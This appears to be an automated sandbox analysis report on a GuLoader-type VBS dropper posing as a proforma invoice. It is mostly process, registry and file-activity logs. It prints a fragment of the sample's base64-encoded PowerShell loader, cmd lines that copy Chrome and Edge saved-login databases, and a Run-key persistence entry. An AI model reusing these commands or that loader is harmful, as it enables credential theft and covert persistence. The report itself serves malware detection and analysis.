ABTAGUAcgBlAG4AIABDAG8AbgB2ACAATwBzAHQAZQBvAHAAbABhACAAVQBuAHAAcgBlAGYAZQByAGEAIABTAGEAbQBtAGUAIABTAGUAbQBpAHMAcABpAHIAYQAgAFIAZQBnAGUAbgBzAGkAYQBuAGUAIABGAGUAaABzAG8AIABTAGsAbwB2ACAASwBvAG0AcABsAGUAdAB0AGUAIABSAGUAZABzAGUAIABEAGkAcwBwAHUAdABkAGEAZwAgAEYAYQB1AGMAIABTAGUAbQBpACAAZwBhAGwAYQBjAHQAIABOAG8AcgBvAHAAaQBhAG4AaQBjACAATQBpAGwAbABpAHMAZQBrAHUAbgAgAEIAZQBnAHIAZQBiAHMAZAAgAEsAZABmAGEAcgAgAE0AaQBzAG8AZwB5ACAAVABvAHAAZgBvAHIAcwBwACAAQwBwAHIAZgAgAGwAaQB2AHMAYgBlAHQAaQAgAE8AcgBkAHIAZQAgAE0AbABkAGUAaQBuAG8AZABvACAARQBrAHMAYQBtAGUAbgAgAFUAZABkAGEAbgBuAGUAbABzAGUAIAANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGsAeQBkADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAARQBuAHUAbQBUAGkAbQBlAEYAbwByAG0AYQB0AHMAQQAoAHUAaQBuAHQAIABEAGUAcgBpAHYAYQB0AGkAdgB0ADUALABpAG4AdAAgAEQAZQByAGkAdgBhAHQAaQB2AHQANgAsACAAaQBuAHQAIABEAGUAcgBpAHYAYQB0AGkAdgB0ADcAKQA7AA0ACgANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUA Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tmhd51lu\tmhd51lu.cmdline Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ielowutil.exe C:\Program Files (x86)\internet explorer\ielowutil.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBA75.tmp" "c:\Users\user\AppData\Local\Temp\tmhd51lu\CSCDE243CA280D4B5C9E282790C554DB9.TMP" Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Internet Explorer\ielowutil.exe "C:\Program Files (x86)\internet explorer\ielowutil.exe" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Internet Explorer\ielowutil.exe "C:\Program Files (x86)\internet explorer\ielowutil.exe" Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20220808 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p4elcppe.v1c.ps1 Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winVBS@46/10@32/22
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4056:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4056:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5456:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5456:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:840:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:840:120:WilError_03
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\Unclear Proforma Invoice.vbs"
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: Binary string: l8C:\Users\user\AppData\Local\Temp\tmhd51lu\tmhd51lu.pdb source: powershell.exe, 00000004.00000002.3064710007.00000000054BC000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: ielowutil.pdbGCTL source: rundll32.exe, 00000017.00000002.6901001103.00000000057A7000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 00000017.00000002.6871882475.0000000003600000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.4148473571.000000002F1D7000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: l8C:\Users\user\AppData\Local\Temp\tmhd51lu\tmhd51lu.pdb| source: powershell.exe, 00000004.00000002.3056176789.0000000005352000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: ielowutil.exe, 00000015.00000003.2869442608.000000001EB08000.00000004.00000800.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000003.2879705616.000000001ECB7000.00000004.00000800.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000002.3513266224.000000001EE60000.00000040.00000800.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000002.3519720123.000000001EF8D000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.6898086927.000000000537D000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.3485670121.0000000004EE8000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.3494974915.000000000509C000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.6887898372.0000000005250000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: ielowutil.exe, ielowutil.exe, 00000015.00000003.2869442608.000000001EB08000.00000004.00000800.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000003.2879705616.000000001ECB7000.00000004.00000800.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000002.3513266224.000000001EE60000.00000040.00000800.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000002.3519720123.000000001EF8D000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.6898086927.000000000537D000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.3485670121.0000000004EE8000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.3494974915.000000000509C000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.6887898372.0000000005250000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: rundll32.pdb source: ielowutil.exe, 00000015.00000003.3479628208.000000000336A000.00000004.00000020.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000002.3487380043.00000000030D0000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: rundll32.pdbGCTL source: ielowutil.exe, 00000015.00000003.3479628208.000000000336A000.00000004.00000020.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000002.3487380043.00000000030D0000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: ielowutil.pdb source: rundll32.exe, 00000017.00000002.6901001103.00000000057A7000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 00000017.00000002.6871882475.0000000003600000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.4148473571.000000002F1D7000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: firefox.pdb source: rundll32.exe, 00000017.00000003.4143320533.0000000007CC6000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.4079152857.0000000007642000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation
barindex
Yara detected GuLoader
Source: Yara match File source: 00000015.00000000.2784654077.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE908CD push ecx; mov dword ptr [esp], ecx 21_2_1EE908D6
Compiles C# or VB.Net code
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tmhd51lu\tmhd51lu.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tmhd51lu\tmhd51lu.cmdline Jump to behavior
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\tmhd51lu\tmhd51lu.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TRF82PDXCN Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TRF82PDXCN Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
